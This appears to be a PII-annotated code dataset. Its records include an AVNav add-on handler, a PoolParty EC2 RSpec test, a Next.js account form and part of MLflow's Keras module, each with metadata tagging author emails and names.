if exc.errno != errno.EPIPE:
raise
except RuntimeError as e:
raise SystemExit(str(e))
|
Python
|
MIT
|
Chrislyle8/Test/lib/ansiblelint/__main__.py
|
857a888e-5f69-442b-ae26-a7df7909ebc2
|
[{"tag": "EMAIL", "value": "will@thames.id.au", "start": 62, "end": 79, "context": "nv python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Will Thames", "start": 49, "end": 60, "context": "#!/usr/bin/env python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby gran"}]
|
[{"tag": "EMAIL", "value": "will@thames.id.au", "start": 62, "end": 79, "context": "nv python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Will Thames", "start": 49, "end": 60, "context": "#!/usr/bin/env python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby gran"}]
|
/**
* @author {benyuwan@gmail.com}
* @file tags的model
*/
import query from '../utils/query'
import escape from '../utils/escape'
class Tags {
async updateTag(id, tags) {
return await query(escape`UPDATE ARTICLE SET tags=${tags} WHERE id=${id}`)
}
}
export default new Tags()
|
JavaScript
|
MIT
|
StudentWan/ashen-blog/server/models/tags.js
|
0e759623-bbc5-46ec-a592-3243cba2fc25
|
[{"tag": "EMAIL", "value": "benyuwan@gmail.com", "start": 16, "end": 34, "context": "/**\n * @author {benyuwan@gmail.com}\n * @file tags\u7684model\n */\n\nimport query from '../u"}]
|
[{"tag": "EMAIL", "value": "benyuwan@gmail.com", "start": 16, "end": 34, "context": "/**\n * @author {benyuwan@gmail.com}\n * @file tags\u7684model\n */\n\nimport query from '../u"}]
|
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
# parts contributed by free-x https://github.com/free-x
# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/
#
###############################################################################
import hashlib
import avnav_handlerList
from avnav_nmea import *
from avnav_worker import *
class AVNUserAppHandler(AVNWorker):
'''
handle the files in the user directory
'''
CHILDNAME="UserTool"
TYPE="addon"
@classmethod
def getStartupGroup(cls):
return 3
@classmethod
def getPrefix(cls):
return None
@classmethod
def getConfigParam(cls, child=None):
#we add this to the ones configured at HTTPServer
if child == cls.CHILDNAME:
return {
'url':None, #we replace $HOST...
'title':'',
'icon':None, #an icon below $datadir/user
'keepUrl':'' #auto detect
}
if not child is None:
return None
rt = {
'interval': '5',
}
return rt
@classmethod
def preventMultiInstance(cls):
return True
@classmethod
def autoInstantiate(cls):
return True
def __init__(self,param):
self.userHandler=None # AVNUserHandler
self.imagesHandler=None # AVNImagesHandler
self.httpServer=None # AVNHTTPServer
self.addonList=[]
self.additionalAddOns=[]
AVNWorker.__init__(self,param)
def startInstance(self, navdata):
self.userHandler=self.findHandlerByName('AVNUserHandler')
if self.userHandler is None:
raise Exception("unable to find a user handler")
self.imagesHandler=self.findHandlerByName('AVNImagesHandler')
if self.imagesHandler is None:
raise Exception("unable to find an images handler")
self.httpServer = self.findHandlerByName('AVNHttpServer')
if self.httpServer is None:
raise Exception("unable to find AVNHttpServer")
super().startInstance(navdata)
# thread run method - just try forever
def run(self):
sleepTime=self.getFloatParam('interval')
self.setInfo('main', "starting", WorkerStatus.STARTED)
self.fillList()
while not self.shouldStop():
self.wait(sleepTime)
def computeKey(self,entry):
md5=hashlib.md5()
for k in ('url','icon','title'):
v=entry.get(k)
if v is not None:
try:
md5.update(v.encode('utf-8'))
except Exception as e:
AVNLog.error("unable to compute md5 for %s: %s",v,e)
return md5.hexdigest()
def fillList(self):
data = []
alreadyFound=set()
childlist = self.param.get(self.CHILDNAME)
if childlist is not None:
for child in childlist:
url=child.get('url')
key=self.computeKey(child)
if url is None:
child['invalid']=True
if key in alreadyFound:
AVNLog.error("duplicate user app found, ignoring %s",url)
while key in alreadyFound:
key = key + "x"
child['name']=key
child['invalid']=True
else:
child['name']=key
alreadyFound.add(key)
item=child.copy()
item['canDelete']=True
item['source']='user'
data.append(item)
serverAddons = self.httpServer.getParamValue(self.CHILDNAME)
nr=0
if serverAddons is not None:
for addon in serverAddons:
newAddon = addon.copy()
newAddon['canDelete']=False
newAddon['name']="server:%d"%nr
newAddon['source']='legacy'
nr+=1
data.append(newAddon)
for addon in data:
url = addon.get('url')
if url is None:
addon['invalid']=True
if not url.startswith("http"):
userFile = self.findFileForUrl(url)
if userFile is None:
AVNLog.error("error: user url %s not found", url)
addon['invalid']=True
if addon.get('title') == '':
del addon['title']
keepUrl = False
if addon.get('keepUrl') is None or addon.get('keepUrl') == '':
if addon.get('url').startswith("http"):
keepUrl = True
else:
if str(addon.get('keepUrl')).lower() == "true":
keepUrl = True
addon['keepUrl'] = keepUrl
icon = addon['icon']
if not icon.startswith("http"):
if not icon.startswith("/user"):
icon="/user/"+icon
addon['icon']=icon
iconpath = self.findFileForUrl(icon)
if iconpath is None:
AVNLog.error("icon path %s for %s not found, ignoring entry", icon, addon['url'])
addon['invalid'] = True
self.addonList=data
self.setInfo('main', "active, %d addons"%len(data), WorkerStatus.NMEA)
return
def findFileForUrl(self,url):
if url is None:
return None
if url.startswith("http"):
return None
(path,query)=self.httpServer.pathQueryFromUrl(url)
filePath=self.httpServer.tryExternalMappings(path,query)
if filePath is None or not os.path.exists(filePath):
return None
return filePath
def findChild(self,name,ignoreInvalid=False):
children=self.param.get(self.CHILDNAME)
if children is None:
return -1
if not isinstance(children,list):
return -1
for i in range(0,len(children)):
child =children[i]
if child.get('name') == name:
if ignoreInvalid:
inList=[e for e in self.addonList if e.get('name') == name and not ( e.get('invalid') == True)]
if len(inList) < 0:
return -1
return i
return -1
def getChildConfig(self,name):
idx=self.findChild(name)
if idx < 0:
return {}
else:
return self.param[self.CHILDNAME][idx]
def handleDelete(self,name):
if name is None:
raise Exception("missing name")
name = AVNUtil.clean_filename(name)
idx=self.findChild(name)
if idx < 0:
raise Exception("unable to find %s"%name)
self.removeChildConfig(self.CHILDNAME,idx)
self.fillList()
def handleList(self,httpHandler,includeInvalid):
host = httpHandler.headers.get('host')
hostparts = host.split(':')
outdata=[]
src=self.additionalAddOns+self.addonList
for addon in src:
if addon.get('invalid') == True and not includeInvalid:
continue
item=addon.copy()
if hostparts is not None:
item['originalUrl']=addon['url']
item['url'] = addon['url'].replace('$HOST', hostparts[0])
outdata.append(item)
rt = AVNUtil.getReturnData(items=outdata)
return rt
def getHandledCommands(self):
rt={"api": self.TYPE, "list": self.TYPE, "delete": self.TYPE}
prefix=self.getPrefix()
if prefix is not None:
rt["path"]=prefix
return rt
def checkName(self,name,doRaise=True):
cleanName=AVNUtil.clean_filename(name)
if name != cleanName:
if doRaise:
raise Exception("name %s is invalid"%name)
return False
return True
def registerAddOn(self,name,url,iconPath,title=None):
newAddon = {
'name': name,
'url': url,
'icon': iconPath,
'title': title,
'canDelete': False,
'source':'plugin'
}
self.additionalAddOns.append(newAddon)
def unregisterAddOn(self,name):
if name is None:
raise Exception("name cannot be None")
for ao in self.additionalAddOns:
if ao.get('name') == name:
self.additionalAddOns.remove(ao)
return True
def deleteByUrl(self,url):
"""
called by the user handler when a user file is deleted
@param url:
@return:
"""
if url is None:
return
for addon in self.addonList:
if addon.get('canDelete') == True and addon.get('url') == url:
self.handleDelete(addon.get('name'))
def handleApiRequest(self, type, subtype, requestparam, **kwargs):
if type == 'api':
command=AVNUtil.getHttpRequestParam(requestparam,'command',True)
name=AVNUtil.getHttpRequestParam(requestparam,'name',False)
if command == 'delete':
self.handleDelete(name)
return AVNUtil.getReturnData()
elif command == 'list':
includeInvalid = AVNUtil.getHttpRequestParam(requestparam, "invalid")
return self.handleList(kwargs.get('handler'),includeInvalid is not None and includeInvalid.lower() == 'true')
elif command == 'update':
url=AVNUtil.getHttpRequestParam(requestparam,'url',True)
icon=AVNUtil.getHttpRequestParam(requestparam,'icon',True)
title=AVNUtil.getHttpRequestParam(requestparam,'title')
param = {}
param['icon'] = icon
param['title'] = title
param['url'] = url
param['keepUrl'] = url.startswith("http")
doAdd=False
if name is None:
doAdd=True
name=self.computeKey(param)
#add
for entry in self.addonList:
if entry['name'] == name:
raise Exception("trying to add an already existing url %s"%url)
param['name']=name
if not url.startswith("http"):
userFile=self.findFileForUrl(url)
if userFile is None:
raise Exception("unable to find a local file for %s"%url)
if not icon.startswith("http"):
iconFile=self.findFileForUrl(icon)
if iconFile is None:
raise Exception("unable to find an icon file for %s"%icon)
idx=self.findChild(name)
if idx < 0 and not doAdd:
raise Exception("did not find a user app with this name")
for k in list(param.keys()):
idx=self.changeChildConfig(self.CHILDNAME,idx,k,param[k],True)
self.writeConfigChanges()
self.fillList()
return AVNUtil.getReturnData()
raise Exception("unknown command for %s api request: %s"%(self.type,command))
if type == "list":
includeInvalid=AVNUtil.getHttpRequestParam(requestparam,"invalid")
return self.handleList(kwargs.get('handler'),includeInvalid is not None and includeInvalid.lower() == 'true')
if type == 'delete':
name = AVNUtil.getHttpRequestParam(requestparam, "name",True)
self.handleDelete(name)
return AVNUtil.getReturnData()
raise Exception("unable to handle user request %s"%(type))
avnav_handlerList.registerHandler(AVNUserAppHandler)
|
Python
|
MIT
|
Littlechay/avnav/server/handler/avnuserapps.py
|
6a6d190a-071d-496d-8be3-9665b7913424
|
[{"tag": "EMAIL", "value": "andreas@wellenvogel.net", "start": 172, "end": 195, "context": "####\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Matt Hawkins", "start": 1492, "end": 1504, "context": "https://github.com/free-x\n# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/\n#\n#############"}, {"tag": "NAME", "value": "Andreas Vogel", "start": 158, "end": 171, "context": "##################\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby"}]
|
[{"tag": "EMAIL", "value": "andreas@wellenvogel.net", "start": 172, "end": 195, "context": "####\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Matt Hawkins", "start": 1492, "end": 1504, "context": "https://github.com/free-x\n# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/\n#\n#############"}, {"tag": "NAME", "value": "Andreas Vogel", "start": 158, "end": 171, "context": "##################\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby"}]
|
require File.dirname(__FILE__) + '/../../spec_helper'
# include Remote
class TestEC2Class
include PoolParty::Remote::RemoterBase
include Ec2
include CloudResourcer
include CloudDsl
def keypair
"fake_keypair"
end
def ami;"ami-abc123";end
def size; "small";end
def security_group; "default";end
def ebs_volume_id; "ebs_volume_id";end
def availabilty_zone; "us-east-1a";end
def verbose
false
end
def ec2
@ec2 ||= EC2::Base.new( :access_key_id => "not_an_access_key", :secret_access_key => "not_a_secret_access_key")
end
end
describe "ec2 remote base" do
before(:each) do
setup
@tr = TestEC2Class.new
stub_remoter_for(@tr)
@tr.stub!(:get_instances_description).and_return response_list_of_instances
end
%w(launch_new_instance! terminate_instance! describe_instance describe_instances create_snapshot).each do |method|
eval <<-EOE
it "should have the method #{method}" do
@tr.respond_to?(:#{method}).should == true
end
EOE
end
describe "helpers" do
it "should be able to convert an ec2 ip to a real ip" do
"ec2-72-44-36-12.compute-1.amazonaws.com".convert_from_ec2_to_ip.should == "72.44.36.12"
end
it "should not throw an error if another string is returned" do
"72.44.36.12".convert_from_ec2_to_ip.should == "72.44.36.12"
end
it "should be able to parse the date from the timestamp" do
"2008-11-13T09:33:09+0000".parse_datetime.should == DateTime.parse("2008-11-13T09:33:09+0000")
end
it "should rescue itself and just return the string if it fails" do
"thisisthedate".parse_datetime.should == "thisisthedate"
end
end
describe "launching" do
before(:each) do
@tr.ec2.stub!(:run_instances).and_return true
end
it "should call run_instances on the ec2 Base class when asking to launch_new_instance!" do
@tr.ec2.should_receive(:run_instances).and_return true
@tr.launch_new_instance!
end
it "should use a specific security group if one is specified" do
@tr.stub!(:security_group).and_return "web"
@tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['web'])).and_return true
@tr.launch_new_instance!
end
it "should use the default security group if none is specified" do
@tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['default'])).and_return true
@tr.launch_new_instance!
end
it "should get the hash response from EC2ResponseObject" do
EC2ResponseObject.should_receive(:get_hash_from_response).and_return true
@tr.launch_new_instance!
end
end
describe "terminating" do
it "should call terminate_instance! on ec2 when asking to terminate_instance!" do
@tr.ec2.should_receive(:terminate_instances).with(:instance_id => "abc-123").and_return true
@tr.terminate_instance!("abc-123")
end
end
describe "describe_instance" do
it "should call get_instances_description on itself" do
@tr.should_receive(:get_instances_description).and_return {}
@tr.describe_instance
end
end
describe "get_instances_description" do
it "should return a hash" do
@tr.describe_instances.class.should == Array
end
it "should call the first node master" do
@tr.describe_instances.first[:name].should == "master"
end
it "should call the second one node1" do
@tr.describe_instances[1][:name].should == "node1"
end
it "should call the third node2" do
@tr.describe_instances[2][:name].should == "terminated_node2"
end
end
describe "create_keypair" do
before(:each) do
Kernel.stub!(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
end
it "should send system to the Kernel" do
Kernel.should_receive(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
@tr.create_keypair
end
it "should try to create the directory when making a new keypair" do
FileUtils.should_receive(:mkdir_p).and_return true
::File.stub!(:directory?).and_return false
@tr.create_keypair
end
it "should not create a keypair if the keypair is nil" do
Kernel.should_not_receive(:system)
@tr.stub!(:keypair).and_return nil
@tr.create_keypair
end
end
describe "create_snapshot" do
# We can assume that create_snapshot on the ec2 gem works
before(:each) do
@tr.ec2.stub!(:create_snapshot).and_return nil
end
it "should create a snapshot of the current EBS volume" do
@tr.ec2.stub!(:create_snapshot).and_return {{"snapshotId" => "snap-123"}}
@tr.stub!(:ebs_volume_id).and_return "vol-123"
@tr.create_snapshot.should == {"snapshotId" => "snap-123"}
end
it "should not create a snapshot if there is no EBS volume" do
@tr.create_snapshot.should == nil
end
end
end
|
Ruby
|
MIT
|
joerichsen/poolparty/spec/poolparty/net/remote_bases/ec2_spec.rb
|
9ed27b97-d674-4161-9aa4-1af798a52090
|
[{"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1336, "end": 1347, "context": " \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n end\n it \"should be able to parse the date"}, {"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1289, "end": 1300, "context": "an error if another string is returned\" do\n \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n "}]
|
[{"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1336, "end": 1347, "context": " \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n end\n it \"should be able to parse the date"}, {"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1289, "end": 1300, "context": "an error if another string is returned\" do\n \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n "}]
|
import type { CustomNextPage } from "next";
import { useState } from "react";
import { useForm } from "react-hook-form";
import { useManageAccount } from "src/hook/vendor/useManageAccount";
import { Layout } from "src/layout";
import {
Attention,
InputLayout,
InputType,
} from "src/pages/vendor/auth/component";
import type {
TypeEmail,
TypeRadio,
TypeSelect,
TypeTel,
TypeText,
TypeTextarea,
TypeUrl,
} from "src/type/vendor";
import type Stripe from "stripe";
const inputItems: (
| TypeEmail
| TypeRadio
| TypeSelect
| TypeTel
| TypeText
| TypeUrl
| TypeTextarea
)[] = [
// {
// id: "business_type",
// label: "事業形態",
// type: "radio",
// radioItem: [{ id: "individual" }, { id: "company" }, { id: "non_profit" }],
// },
// {
// id: "first_name_kanji",
// label: "氏名",
// type: "text",
// placeholder: "姓",
// },
// {
// id: "last_name_kanji",
// label: "氏名",
// type: "text",
// placeholder: "名",
// },
// {
// id: "first_name_kana",
// label: "氏名(かな)",
// type: "text",
// placeholder: "姓",
// },
// {
// id: "last_name_kana",
// label: "氏名(かな)",
// type: "text",
// placeholder: "名",
// },
{
id: "email",
label: "メールアドレス",
type: "email",
autoComplete: "email",
placeholder: "test.satou@example.com",
},
// {
// id: "businessProfileMcc",
// label: "事業カテゴリー",
// type: "select",
// selectItem: [
// { value: "", text: "選んでください。" },
// { value: "Dog", text: "Dog" },
// { value: "Cat", text: "Cat" },
// { value: "Bird", text: "Bird" },
// ],
// },
// {
// id: "businessProfileProductDescription",
// label: "事業詳細",
// type: "textarea",
// },
];
const Create: CustomNextPage = () => {
const [isLoading, setIsLoading] = useState(false);
const { createAccount, createAccountLink } = useManageAccount();
const {
register,
handleSubmit,
formState: { errors },
} = useForm();
const onSubmit = async (e: any) => {
setIsLoading(true);
const params: Stripe.AccountCreateParams = { ...e };
const { id } = await createAccount(params);
await createAccountLink(id);
setIsLoading(false);
};
return (
<div className="mx-auto max-w-[700px] text-center">
<div className="space-y-3">
<h2>チケットオーナーアカウント作成</h2>
<Attention />
<div className="p-10 rounded-lg border border-gray">
<form onSubmit={handleSubmit(onSubmit)} className="text-center">
{inputItems.map((item) => {
return (
<InputLayout key={item.id} item={item} errorMessage={errors}>
<InputType item={item} register={register} />
</InputLayout>
);
})}
<div className="relative py-2 px-5">
<input type="submit" value="送信" />
{isLoading && (
<div className="flex absolute inset-0 justify-center bg-white">
<div className="w-5 h-5 rounded-full border-4 border-blue border-t-transparent animate-spin"></div>
</div>
)}
</div>
</form>
</div>
</div>
</div>
);
};
Create.getLayout = Layout;
export default Create;
|
TypeScript
|
MIT
|
yu-Yoshiaki/Ticketia/src/pages/vendor/auth/create.page.tsx
|
2cc29e0f-e1f0-47ac-af0d-0d5587e1f1cb
|
[{"tag": "EMAIL", "value": "test.satou@example.com", "start": 1338, "end": 1360, "context": "il\",\n autoComplete: \"email\",\n placeholder: \"test.satou@example.com\",\n },\n // {\n // id: \"businessProfileMcc\",\n "}]
|
[{"tag": "EMAIL", "value": "test.satou@example.com", "start": 1338, "end": 1360, "context": "il\",\n autoComplete: \"email\",\n placeholder: \"test.satou@example.com\",\n },\n // {\n // id: \"businessProfileMcc\",\n "}]
|
export * from 'https://deno.land/std@0.142.0/testing/asserts.ts';
|
TypeScript
|
MIT
|
Azulamb/minirachne/tests/_setup.ts
|
08b21444-41cd-466e-bc66-a391f37b1bb1
|
[]
|
[]
|
"""
The ``mlflow.keras`` module provides an API for logging and loading Keras models. This module
exports Keras models with the following flavors:
Keras (native) format
This is the main flavor that can be loaded back into Keras.
:py:mod:`mlflow.pyfunc`
Produced for use by generic pyfunc-based deployment tools and batch inference.
"""
import importlib
import os
import yaml
import gorilla
import tempfile
import shutil
import pandas as pd
from distutils.version import LooseVersion
from mlflow import pyfunc
from mlflow.models import Model
import mlflow.tracking
from mlflow.exceptions import MlflowException
from mlflow.models.signature import ModelSignature
from mlflow.models.utils import ModelInputExample, _save_example
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.utils.environment import _mlflow_conda_env
from mlflow.utils.model_utils import _get_flavor_configuration
from mlflow.utils.annotations import experimental
from mlflow.utils.autologging_utils import try_mlflow_log, log_fn_args_as_params
FLAVOR_NAME = "keras"
# File name to which custom objects cloudpickle is saved - used during save and load
_CUSTOM_OBJECTS_SAVE_PATH = "custom_objects.cloudpickle"
_KERAS_MODULE_SPEC_PATH = "keras_module.txt"
# File name to which keras model is saved
_MODEL_SAVE_PATH = "model.h5"
# Conda env subpath when saving/loading model
_CONDA_ENV_SUBPATH = "conda.yaml"
def get_default_conda_env(include_cloudpickle=False, keras_module=None):
"""
:return: The default Conda environment for MLflow Models produced by calls to
:func:`save_model()` and :func:`log_model()`.
"""
import tensorflow as tf
conda_deps = [] # if we use tf.keras we only need to declare dependency on tensorflow
pip_deps = []
if keras_module is None:
import keras
keras_module = keras
if keras_module.__name__ == "keras":
# Temporary fix: the created conda environment has issues installing keras >= 2.3.1
if LooseVersion(keras_module.__version__) < LooseVersion('2.3.1'):
conda_deps.append("keras=={}".format(keras_module.__version__))
else:
pip_deps.append("keras=={}".format(keras_module.__version__))
if include_cloudpickle:
import cloudpickle
pip_deps.append("cloudpickle=={}".format(cloudpickle.__version__))
# Temporary fix: conda-forge currently does not have tensorflow > 1.14
# The Keras pyfunc representation requires the TensorFlow
# backend for Keras. Therefore, the conda environment must
# include TensorFlow
if LooseVersion(tf.__version__) <= LooseVersion('1.13.2'):
conda_deps.append("tensorflow=={}".format(tf.__version__))
else:
pip_deps.append("tensorflow=={}".format(tf.__version__))
return _mlflow_conda_env(
additional_conda_deps=conda_deps,
additional_pip_deps=pip_deps,
additional_conda_channels=None)
def save_model(keras_model, path, conda_env=None, mlflow_model=None, custom_objects=None,
keras_module=None,
signature: ModelSignature = None, input_example: ModelInputExample = None,
**kwargs):
"""
Save a Keras model to a path on the local file system.
:param keras_model: Keras model to be saved.
:param path: Local path where the model is to be saved.
:param conda_env: Either a dictionary representation of a Conda environment or the path to a
Conda environment yaml file. If provided, this decsribes the environment
this model should be run in. At minimum, it should specify the
dependencies contained in :func:`get_default_conda_env()`. If
``None``, the default :func:`get_default_conda_env()` environment is
added to the model. The following is an *example* dictionary
representation of a Conda environment::
{
'name': 'mlflow-env',
'channels': ['defaults'],
'dependencies': [
'python=3.7.0',
'keras=2.2.4',
'tensorflow=1.8.0'
]
}
:param mlflow_model: MLflow model config this flavor is being added to.
:param custom_objects: A Keras ``custom_objects`` dictionary mapping names (strings) to
custom classes or functions associated with the Keras model. MLflow saves
these custom layers using CloudPickle and restores them automatically
when the model is loaded with :py:func:`mlflow.keras.load_model` and
:py:func:`mlflow.pyfunc.load_model`.
:param keras_module: Keras module to be used to save / load the model
(``keras`` or ``tf.keras``). If not provided, MLflow will
attempt to infer the Keras module based on the given model.
:param kwargs: kwargs to pass to ``keras_model.save`` method.
:param signature: (Experimental) :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: (Experimental) Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example will be converted to a Pandas DataFrame and then
serialized to json using the Pandas split-oriented format. Bytes are
base64-encoded.
.. code-block:: python
:caption: Example
import mlflow
# Build, compile, and train your model
keras_model = ...
keras_model_path = ...
keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
results = keras_model.fit(
x_train, y_train, epochs=20, batch_size = 128, validation_data=(x_val, y_val))
# Save the model as an MLflow Model
mlflow.keras.save_model(keras_model, keras_model_path)
"""
if keras_module is None:
def _is_plain_keras(model):
try:
# NB: Network is the first parent with save method
import keras.engine.network
return isinstance(model, keras.engine.network.Network)
except ImportError:
return False
def _is_tf_keras(model):
try:
# NB: Network is not exposed in tf.keras, we check for Model instead.
import tensorflow.keras.models
return isinstance(model, tensorflow.keras.models.Model)
except ImportError:
return False
if _is_plain_keras(keras_model):
keras_module = importlib.import_module("keras")
elif _is_tf_keras(keras_model):
keras_module = importlib.import_module("tensorflow.keras")
else:
raise MlflowException("Unable to infer keras module from the model, please specify "
"which keras module ('keras' or 'tensorflow.keras') is to be "
"used to save and load the model.")
elif type(keras_module) == str:
keras_module = importlib.import_module(keras_module)
# check if path exists
path = os.path.abspath(path)
if os.path.exists(path):
raise MlflowException("Path '{}' already exists".format(path))
# construct new data folder in existing path
data_subpath = "data"
data_path = os.path.join(path, data_subpath)
os.makedirs(data_path)
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
# save custom objects if there are custom objects
if custom_objects is not None:
_save_custom_objects(data_path, custom_objects)
# save keras module spec to path/data/keras_module.txt
with open(os.path.join(data_path, _KERAS_MODULE_SPEC_PATH), "w") as f:
f.write(keras_module.__name__)
# save keras model to path/data/model.h5
model_subpath = os.path.join(data_subpath, _MODEL_SAVE_PATH)
model_path = os.path.join(path, model_subpath)
if path.startswith('/dbfs/'):
# The Databricks Filesystem uses a FUSE implementation that does not support
# random writes. It causes an error.
with tempfile.NamedTemporaryFile(suffix='.h5') as f:
keras_model.save(f.name, **kwargs)
f.flush() # force flush the data
shutil.copyfile(src=f.name, dst=model_path)
else:
keras_model.save(model_path, **kwargs)
# update flavor info to mlflow_model
mlflow_model.add_flavor(FLAVOR_NAME,
keras_module=keras_module.__name__,
keras_version=keras_module.__version__,
data=data_subpath)
# save conda.yaml info to path/conda.yml
if conda_env is None:
conda_env = get_default_conda_env(include_cloudpickle=custom_objects is not None,
keras_module=keras_module)
elif not isinstance(conda_env, dict):
with open(conda_env, "r") as f:
conda_env = yaml.safe_load(f)
with open(os.path.join(path, _CONDA_ENV_SUBPATH), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# append loader_module, data and env data to mlflow_model
pyfunc.add_to_model(mlflow_model, loader_module="mlflow.keras",
data=data_subpath, env=_CONDA_ENV_SUBPATH)
# save mlflow_model to path/MLmodel
mlflow_model.save(os.path.join(path, "MLmodel"))
def log_model(keras_model, artifact_path, conda_env=None, custom_objects=None, keras_module=None,
registered_model_name=None, signature: ModelSignature=None,
input_example: ModelInputExample=None, **kwargs):
"""
Log a Keras model as an MLflow artifact for the current run.
:param keras_model: Keras model to be saved.
:param artifact_path: Run-relative artifact path.
:param conda_env: Either a dictionary representation of a Conda environment or
the path to a Conda environment yaml file.
If provided, this describes the environment this model should be
run in. At minimum, it should specify the dependencies
contained in :func:`get_default_conda_env()`. If ``None``, the default
:func:`mlflow.keras.get_default_conda_env()` environment is added to
the model. The following is an *example* dictionary representation of a
Conda environment::
{
'name': 'mlflow-env',
'channels': ['defaults'],
'dependencies': [
'python=3.7.0',
'keras=2.2.4',
'tensorflow=1.8.0'
]
}
:param custom_objects: A Keras ``custom_objects`` dictionary mapping names (strings) to
custom classes or functions associated with the Keras model. MLflow saves
these custom layers using CloudPickle and restores them automatically
when the model is loaded with :py:func:`mlflow.keras.load_model` and
:py:func:`mlflow.pyfunc.load_model`.
:param keras_module: Keras module to be used to save / load the model
(``keras`` or ``tf.keras``). If not provided, MLflow will
attempt to infer the Keras module based on the given model.
:param registered_model_name: (Experimental) If given, create a model version under
``registered_model_name``, also creating a registered model if one
with the given name does not exist.
:param signature: (Experimental) :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: (Experimental) Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example will be converted to a Pandas DataFrame and then
serialized to json using the Pandas split-oriented format. Bytes are
base64-encoded.
:param kwargs: kwargs to pass to ``keras_model.save`` method.
.. code-block:: python
:caption: Example
from keras import Dense, layers
import mlflow
# Build, compile, and train your model
keras_model = ...
keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
results = keras_model.fit(
x_train, y_train, epochs=20, batch_size = 128, validation_data=(x_val, y_val))
# Log metrics and log the model
with mlflow.start_run() as run:
mlflow.keras.log_model(keras_model, "models")
"""
Model.log(artifact_path=artifact_path, flavor=mlflow.keras,
keras_model=keras_model, conda_env=conda_env, custom_objects=custom_objects,
keras_module=keras_module, registered_model_name=registered_model_name,
signature=signature, input_example=input_example,
**kwargs)
def _save_custom_objects(path, custom_objects):
"""
Save custom objects dictionary to a cloudpickle file so a model can be easily loaded later.
:param path: An absolute path that points to the data directory within /path/to/model.
:param custom_objects: Keras ``custom_objects`` is a dictionary mapping
names (strings) to custom classes or functions to be considered
during deserialization. MLflow saves these custom layers using
